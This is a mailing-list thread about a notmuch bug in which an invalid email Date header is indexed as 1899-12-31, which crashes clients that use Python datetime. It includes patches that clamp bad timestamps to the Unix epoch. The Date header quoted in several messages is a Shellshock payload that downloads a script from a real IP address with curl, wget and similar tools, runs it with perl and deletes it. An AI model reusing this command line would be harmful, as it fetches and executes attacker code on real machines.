unofficial mirror of notmuch@notmuchmail.org
* bug: notmuch cannot handle invalid Date fields
@ 2015-04-22  6:56 Johannes Schauer
  2015-04-22 13:37 ` Tomi Ollila
                   ` (3 more replies)
  0 siblings, 4 replies; 9+ messages in thread
From: Johannes Schauer @ 2015-04-22  6:56 UTC (permalink / raw)
  To: notmuch

Hi,

I recently received an email with the following date field (the value of all
other headers is the same):

Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;

When doing `notmuch search lwp-download` I get:

thread:000000000001ea6b   1899-12-31 [1/1] {; () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &; (inbox unread)

You can see that the date is 1899-12-31 which is wrong.

This is annoying because the python module datetime which is for example used
by the notmuch client alot cannot handle dates before the year 1900 and will
thus never show this email in its thread view but instead display an exception
every time the view is refreshed.

It would be great if an invalid date could either somehow default to a nil
value or be a date that is 1900 or later.

Thanks!

cheers, josch



* Re: bug: notmuch cannot handle invalid Date fields
  2015-04-22  6:56 bug: notmuch cannot handle invalid Date fields Johannes Schauer
@ 2015-04-22 13:37 ` Tomi Ollila
  2015-04-22 13:42   ` Johannes Schauer
  2017-03-12  1:38 ` David Bremner
                   ` (2 subsequent siblings)
  3 siblings, 1 reply; 9+ messages in thread
From: Tomi Ollila @ 2015-04-22 13:37 UTC (permalink / raw)
  To: Johannes Schauer, notmuch

On Wed, Apr 22 2015, Johannes Schauer <j.schauer@email.de> wrote:

> Hi,
>
> I recently received an email with the following date field (the value of all
> other headers is the same):
>
> Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
>
> When doing `notmuch search lwp-download` I get:
>
> thread:000000000001ea6b   1899-12-31 [1/1] {; () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &; (inbox unread)
>
> You can see that the date is 1899-12-31 which is wrong.
>
> This is annoying because the python module datetime which is for example used
> by the notmuch client alot cannot handle dates before the year 1900 and will
> thus never show this email in its thread view but instead display an exception
> every time the view is refreshed.

What do you mean by saying that datetime cannot handle dates before 1900?

:  $ python
:  Python 2.7.6 (default, Mar 22 2014, 22:59:56)
:  ...
:  >>> datetime.datetime.strptime('1799-11', '%Y-%m')
:  datetime.datetime(1799, 11, 1, 0, 0)
:  >>> x=datetime.datetime.strptime('1799-11', '%Y-%m')
:  >>> x.isoformat()
:  '1799-11-01T00:00:00'

Tomi


> It would be great if an invalid date could either somehow default to a nil
> value or be a date that is 1900 or later.
>
> Thanks!
>
> cheers, josch


* Re: bug: notmuch cannot handle invalid Date fields
  2015-04-22 13:37 ` Tomi Ollila
@ 2015-04-22 13:42   ` Johannes Schauer
  0 siblings, 0 replies; 9+ messages in thread
From: Johannes Schauer @ 2015-04-22 13:42 UTC (permalink / raw)
  To: notmuch

Hi,

Quoting Tomi Ollila (2015-04-22 15:37:15)
> What do you mean by saying that datetime cannot handle dates before 1900?
> 
> :  $ python
> :  Python 2.7.6 (default, Mar 22 2014, 22:59:56)
> :  ...
> :  >>> datetime.datetime.strptime('1799-11', '%Y-%m')
> :  datetime.datetime(1799, 11, 1, 0, 0)
> :  >>> x=datetime.datetime.strptime('1799-11', '%Y-%m')
> :  >>> x.isoformat()
> :  '1799-11-01T00:00:00'

from the docs:

"The exact range of years for which strftime() works also varies across
platforms. Regardless of platform, years before 1900 cannot be used."

or:

$ python
Python 2.7.9 (default, Dec 11 2014, 08:58:12) 
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import datetime
>>> x=datetime.datetime.strptime('1799-11', '%Y-%m')
>>> x.strftime("%P")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ValueError: year=1799 is before 1900; the datetime strftime() methods require year >= 1900
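
A minimal sketch of how a client could guard against this, assuming a
hypothetical helper `safe_format` (it is not part of alot or notmuch): fall
back to isoformat(), which has no such year restriction, whenever strftime()
rejects the year.

```python
import datetime


def safe_format(dt, fmt="%Y-%m-%d"):
    """Format dt with strftime(), falling back to ISO 8601 on failure.

    Hypothetical helper for illustration; not taken from alot or notmuch.
    """
    try:
        return dt.strftime(fmt)
    except ValueError:
        # Python 2 raises ValueError here for years before 1900.
        return dt.isoformat()


old = datetime.datetime(1799, 11, 1)
print(safe_format(old))
```

Depending on the Python version, this prints either the strftime() result or
the ISO 8601 fallback; in both cases no exception reaches the caller.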


cheers, josch



* Re: bug: notmuch cannot handle invalid Date fields
  2015-04-22  6:56 bug: notmuch cannot handle invalid Date fields Johannes Schauer
  2015-04-22 13:37 ` Tomi Ollila
@ 2017-03-12  1:38 ` David Bremner
  2017-03-12 12:51 ` [PATCH 1/2] lib: add known broken test for parsing bad dates David Bremner
  2017-03-19 12:31 ` bug: notmuch cannot handle invalid Date fields David Bremner
  3 siblings, 0 replies; 9+ messages in thread
From: David Bremner @ 2017-03-12  1:38 UTC (permalink / raw)
  To: Johannes Schauer, notmuch; +Cc: Daniel Kahn Gillmor

Johannes Schauer <j.schauer@email.de> writes:

> Hi,
>
> I recently received an email with the following date field (the value of all
> other headers is the same):
>
> Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
>
> When doing `notmuch search lwp-download` I get:
>
> thread:000000000001ea6b   1899-12-31 [1/1] {; () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &; (inbox unread)
>
> You can see that the date is 1899-12-31 which is wrong.
>
> This is annoying because the python module datetime which is for example used
> by the notmuch client alot cannot handle dates before the year 1900 and will
> thus never show this email in its thread view but instead display an exception
> every time the view is refreshed.
>
> It would be great if an invalid date could either somehow default to a nil
> value or be a date that is 1900 or later.
>

I believe the underlying problem is a bug in the gmime library. I've
reported it at

         https://bugzilla.gnome.org/show_bug.cgi?id=779923

We'll see if upstream agrees.  If my understanding of the situation is
correct, it should be easy enough to clamp the return value from gmime
so that only non-negative time values are saved into the notmuch database.
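
The clamping idea can be sketched in Python as follows. This is only an
illustration under assumptions: `clamp_timestamp` and `to_utc_date` are
hypothetical names, and the input -2209075200 (1899-12-31 00:00:00 UTC) is
chosen to match the date in the report; it is not a value confirmed to come
from gmime.

```python
import datetime


def clamp_timestamp(time_value):
    """Map negative epoch seconds to 0; leave other values unchanged."""
    return time_value if time_value >= 0 else 0


def to_utc_date(time_value):
    """Render epoch seconds as a UTC calendar date string."""
    epoch = datetime.datetime(1970, 1, 1)
    return (epoch + datetime.timedelta(seconds=time_value)).date().isoformat()


# Illustrative input: a pre-1900 value is stored as the Unix epoch instead.
print(to_utc_date(clamp_timestamp(-2209075200)))  # 1970-01-01
```

The trade-off is that a message with an unparseable date becomes
indistinguishable from one genuinely dated 1970-01-01.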

d


* [PATCH 1/2] lib: add known broken test for parsing bad dates.
  2015-04-22  6:56 bug: notmuch cannot handle invalid Date fields Johannes Schauer
  2015-04-22 13:37 ` Tomi Ollila
  2017-03-12  1:38 ` David Bremner
@ 2017-03-12 12:51 ` David Bremner
  2017-03-12 12:51   ` [PATCH 2/2] lib: clamp return value of g_mime_utils_header_decode_date to >=0 David Bremner
  2017-03-19 12:31 ` bug: notmuch cannot handle invalid Date fields David Bremner
  3 siblings, 1 reply; 9+ messages in thread
From: David Bremner @ 2017-03-12 12:51 UTC (permalink / raw)
  To: Johannes Schauer, notmuch

This reproduces the symptoms of bug report
id:20150422065630.6330.90536@hoothoot
---
 test/T660-bad-date.sh | 15 +++++++++++++++
 1 file changed, 15 insertions(+)
 create mode 100755 test/T660-bad-date.sh

diff --git a/test/T660-bad-date.sh b/test/T660-bad-date.sh
new file mode 100755
index 00000000..6463d5b8
--- /dev/null
+++ b/test/T660-bad-date.sh
@@ -0,0 +1,15 @@
+#!/usr/bin/env bash
+test_description="parsing of bad dates"
+. ./test-lib.sh || exit 1
+
+add_message [date]='"()"'
+
+test_begin_subtest 'Bad dates translate to a date after the Unix epoch'
+test_subtest_known_broken
+cat <<EOF >EXPECTED
+thread:0000000000000001   1970-01-01 [1/1] Notmuch Test Suite; Test message #1 (inbox unread)
+EOF
+notmuch search '*' > OUTPUT
+test_expect_equal_file EXPECTED OUTPUT
+
+test_done
-- 
2.11.0


* [PATCH 2/2] lib: clamp return value of g_mime_utils_header_decode_date to >=0
  2017-03-12 12:51 ` [PATCH 1/2] lib: add known broken test for parsing bad dates David Bremner
@ 2017-03-12 12:51   ` David Bremner
  2017-03-15 20:09     ` Tomi Ollila
  2017-03-16  1:16     ` David Bremner
  0 siblings, 2 replies; 9+ messages in thread
From: David Bremner @ 2017-03-12 12:51 UTC (permalink / raw)
  To: Johannes Schauer, notmuch

For reasons not completely understood at this time, gmime (as of
2.6.22) is returning a date before 1900 on bad date input. Since this
confuses some other software, we clamp such dates to 0,
i.e. 1970-01-01.
---
 lib/message.cc | 9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)

diff --git a/lib/message.cc b/lib/message.cc
index 007f1171..8a8a25b4 100644
--- a/lib/message.cc
+++ b/lib/message.cc
@@ -1034,10 +1034,15 @@ _notmuch_message_set_header_values (notmuch_message_t *message,
 
     /* GMime really doesn't want to see a NULL date, so protect its
      * sensibilities. */
-    if (date == NULL || *date == '\0')
+    if (date == NULL || *date == '\0') {
 	time_value = 0;
-    else
+    } else {
 	time_value = g_mime_utils_header_decode_date (date, NULL);
+	/*
+	 * Workaround for https://bugzilla.gnome.org/show_bug.cgi?id=779923
+	 */
+	time_value = (time_value < 0) ? 0 : time_value;
+    }
 
     message->doc.add_value (NOTMUCH_VALUE_TIMESTAMP,
 			    Xapian::sortable_serialise (time_value));
-- 
2.11.0


* Re: [PATCH 2/2] lib: clamp return value of g_mime_utils_header_decode_date to >=0
  2017-03-12 12:51   ` [PATCH 2/2] lib: clamp return value of g_mime_utils_header_decode_date to >=0 David Bremner
@ 2017-03-15 20:09     ` Tomi Ollila
  2017-03-16  1:16     ` David Bremner
  1 sibling, 0 replies; 9+ messages in thread
From: Tomi Ollila @ 2017-03-15 20:09 UTC (permalink / raw)
  To: David Bremner, Johannes Schauer, notmuch

On Sun, Mar 12 2017, David Bremner <david@tethera.net> wrote:

> For reasons not completely understood at this time, gmime (as of
> 2.6.22) is returning a date before 1900 on bad date input. Since this
> confuses some other software, we clamp such dates to 0,
> i.e. 1970-01-01.
> ---
>  lib/message.cc | 9 +++++++--
>  1 file changed, 7 insertions(+), 2 deletions(-)
>
> diff --git a/lib/message.cc b/lib/message.cc
> index 007f1171..8a8a25b4 100644
> --- a/lib/message.cc
> +++ b/lib/message.cc
> @@ -1034,10 +1034,15 @@ _notmuch_message_set_header_values (notmuch_message_t *message,
>  
>      /* GMime really doesn't want to see a NULL date, so protect its
>       * sensibilities. */
> -    if (date == NULL || *date == '\0')
> +    if (date == NULL || *date == '\0') {
>  	time_value = 0;

"Too bad" we already do this time_value = 0, otherwise I'd have suggested
-2111111111 

$ perl -le 'print scalar localtime -2111111111'
Sat Feb  7 21:54:38 1903

That is a date where the Julian calendar is also in the 20th century ;)

> -    else
> +    } else {
>  	time_value = g_mime_utils_header_decode_date (date, NULL);
> +	/*
> +	 * Workaround for https://bugzilla.gnome.org/show_bug.cgi?id=779923
> +	 */
> +	time_value = (time_value < 0) ? 0 : time_value;

Although the above probably realizes as..., I'd propose (IMO for clarity)

        if (time_value < 0)
            time_value = 0;

Anyway, LGTM.

Tomi


Btw: I added notmuch show --format=json '*' >&6 to the test script, and it
printed:

[[[{"id": "msg-001@notmuch-test-suite", "match": true, "excluded": false,
"filename": ["/home/too/vc/ext/notmuch/test/tmp.T111-x/mail/msg-001"],
"timestamp": 2085892096, "date_relative": "1899-12-31", "tags": ["inbox",
"unread"], "headers": {"Subject": "Test message #1", "From": "Notmuch Test
Suite <test_suite@notmuchmail.org>", "To": "Notmuch Test Suite
<test_suite@notmuchmail.org>", "Date": "Sun, 31 Dec 1899 00:00:00 +0000"},
"body": [{"id": 1, "content-type": "text/plain", "content": "This is just a
test message (#1)\n"}]}, []]]]

(... which one can see I just pasted to a new file... ;)


$ perl -le 'print scalar localtime 2085892096' 
Wed Feb  6 08:28:16 2036

So, it looks like we store the large negative time_value in a 32-bit signed
integer...
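
The arithmetic is consistent with that guess. A quick check, assuming the
intended value is 1899-12-31 00:00:00 UTC and that the truncation keeps only
the low 32 bits (`wrap_int32` is a hypothetical helper, not notmuch code):

```python
import datetime


def wrap_int32(value):
    """Reinterpret an integer as a signed 32-bit two's-complement value."""
    return (value + 2**31) % 2**32 - 2**31


epoch = datetime.datetime(1970, 1, 1)
delta = datetime.datetime(1899, 12, 31) - epoch
seconds = delta.days * 86400 + delta.seconds  # seconds relative to the epoch

print(seconds, wrap_int32(seconds))  # -2209075200 2085892096
```

The wrapped value equals the "timestamp" field in the JSON output above, i.e.
-2209075200 + 2^32 = 2085892096.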



> +    }
>  
>      message->doc.add_value (NOTMUCH_VALUE_TIMESTAMP,
>  			    Xapian::sortable_serialise (time_value));
> -- 
> 2.11.0


* Re: [PATCH 2/2] lib: clamp return value of g_mime_utils_header_decode_date to >=0
  2017-03-12 12:51   ` [PATCH 2/2] lib: clamp return value of g_mime_utils_header_decode_date to >=0 David Bremner
  2017-03-15 20:09     ` Tomi Ollila
@ 2017-03-16  1:16     ` David Bremner
  1 sibling, 0 replies; 9+ messages in thread
From: David Bremner @ 2017-03-16  1:16 UTC (permalink / raw)
  To: Johannes Schauer, notmuch

David Bremner <david@tethera.net> writes:

> For reasons not completely understood at this time, gmime (as of
> 2.6.22) is returning a date before 1900 on bad date input. Since this
> confuses some other software, we clamp such dates to 0,
> i.e. 1970-01-01.

series pushed, amended per Tomi's suggestion. It's possible I've been
writing an unhealthy amount of scheme lately. Dunno what else would make
the ternary if operator look sensible.

d


* Re: bug: notmuch cannot handle invalid Date fields
  2015-04-22  6:56 bug: notmuch cannot handle invalid Date fields Johannes Schauer
                   ` (2 preceding siblings ...)
  2017-03-12 12:51 ` [PATCH 1/2] lib: add known broken test for parsing bad dates David Bremner
@ 2017-03-19 12:31 ` David Bremner
  3 siblings, 0 replies; 9+ messages in thread
From: David Bremner @ 2017-03-19 12:31 UTC (permalink / raw)
  To: Johannes Schauer, notmuch

Johannes Schauer <j.schauer@email.de> writes:

> Hi,
>
> I recently received an email with the following date field (the value of all
> other headers is the same):
>
> Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
>
> When doing `notmuch search lwp-download` I get:
>
> thread:000000000001ea6b   1899-12-31 [1/1] {; () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &; (inbox unread)
>
> You can see that the date is 1899-12-31 which is wrong.

This should now be fixed, as of 62822a4e2

d
